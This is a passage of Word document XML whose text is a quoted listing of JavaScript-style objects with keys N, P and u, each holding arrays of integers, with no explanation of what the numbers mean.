    </w:p>
    <w:p w14:paraId="7D12E0A7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58415B7B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5F5E6A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB5F575" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E964106" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454973DF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEF130C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 11, 14, 234, 305]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BA6F74" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5652828A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3666DA53" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D2751A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE31CD7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D65F5C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601544FB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0434FD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 8, 13, 19, 159]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B71A5A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ECC60B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63766DAF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515ABCAC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [230, 233, 305]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2104F41E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5615F060" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B365AC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5750464F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA621D6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296CE01E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DE9C6A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07236D39" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7521C798" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF312A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271F2AAC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B4BD15" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC6BC19" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2AF376" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CAAA51" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F4C4F7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [11, 38, 42, 46, 49, 79, 96, 121, 145, 171, 210, 221, 233, 234, 268, 280, 305, 310]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5434DB8C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD75CF5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0315E758" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A58C141" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [45, 113, 244]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FAD3DA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669E18B3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A26884E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13480D27" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2D4B76" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB4D3D8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462FE77A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CFFD47" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 41, 128]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64344AFB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452D763F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1E1A69" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E831F2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD0D7DF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F66061" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DC1EF5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529CA646" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA39C47" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AF2942" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCE9E2B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7096C59D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63280AC0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12314530" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07380953" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCA6230" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E258548" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3076FDB0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEF1D61" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73470746" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EEFDFF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1992D2F7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B41178" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070EE3DE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 6, 16, 19, 178, 288]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614862C2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3101A5A3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273C2D0B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A98B5C5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8217F0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDD3612" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7008E2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E11B6B7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [18, 23, 24, 35, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089B8AFC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522FACCE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A052AB7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034453B9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [22]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4C9E3F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695FC003" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19561DDE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C47AE8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ABE507" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487E3A13" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D86C066" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [9, 10, 11, 15, 17, 19, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258FC633" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 3, 4, 5, 6, 7, 8, 12, 13, 14, 16, 18, 20, 21, 22, 157, 159, 182, 196, 245, 311, 317, 342]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B34E66" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D3578D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [2, 1, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD2946A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B947855" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8, 11, 12]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D915D7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7827C573" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CEBFA5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9AE1F4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DB0C48" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C72FA4E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [11],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F93523" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 15, 16, 17],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40785F66" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [14, 23, 27, 40, 71, 108, 134, 140, 200, 219, 232, 249, 260, 277, 282, 283, 298, 303, 319, 330, 343, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F0A42B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED6F6D6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C85B31" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5, 6, 7, 8, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5F2C8E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 9, 11, 16, 17, 22, 24, 27, 28, 29, 56, 138, 159, 175, 317, 335]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3D47E8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFC8717" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D76834" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC56D7B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4405D250" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E621D9B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05169549" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E69BA0E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 10, 20, 26]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49138F31" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E69180E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CC8EF9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7295E801" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF270CF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDEBE8C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6240B263" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67085C46" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C8E13D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2375CC03" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79204350" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C3450D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [18, 19, 23, 25, 34, 37, 39, 41, 48, 159, 245, 311, 317]</w:t>
      </w:r>
    </w:p>
